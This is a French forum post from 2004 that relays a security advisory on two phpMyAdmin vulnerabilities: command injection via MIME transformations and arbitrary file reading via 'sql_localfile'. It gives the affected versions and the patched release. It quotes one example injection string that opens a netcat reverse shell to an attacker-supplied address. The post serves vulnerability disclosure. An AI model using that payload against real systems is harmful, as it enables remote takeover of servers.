Auteur
Anonyme
Anonyme
Forum » » Sécurité » » [Résolu] - Alerte PHPMYADMIN
Posté : 14 déc. 2004 à 16:44 
Deux vulnérabilités ont été identifiées dans phpMyAdmin, elles pourraient être exploitées par un attaquant distant afin de compromettre un système vulnérable. Le premier problème se situe au niveau des transformations externes MIME, ce qui pourrait permettre l'injection de commandes arbitraires (ex : F';nc -e /bin/sh $IP 80;echo 'A). La seconde vulnérabilité se situe au niveau du mécanisme UploadDir et read_dump.php qui ne filtrent pas correctement la variable "sql_localfile", ce qui pourrait permettre l'accès à des fichiers arbitraires.
Note : L'exploitation de ces vulnérabilités n'est possible que si "PHP safe mode" est à "off".
* Versions Vulnérables *
phpMyAdmin versions inférieures à 2.6.1-rc1
* Solution *
phpMyAdmin version 2.6.1-rc1 :
http://www.phpmyadmin.net/home_page/downloads.php
Source : K-otik
Cet article provient de NPDS
https://www.npds.org/viewtopic.php?topic=14730&forum=12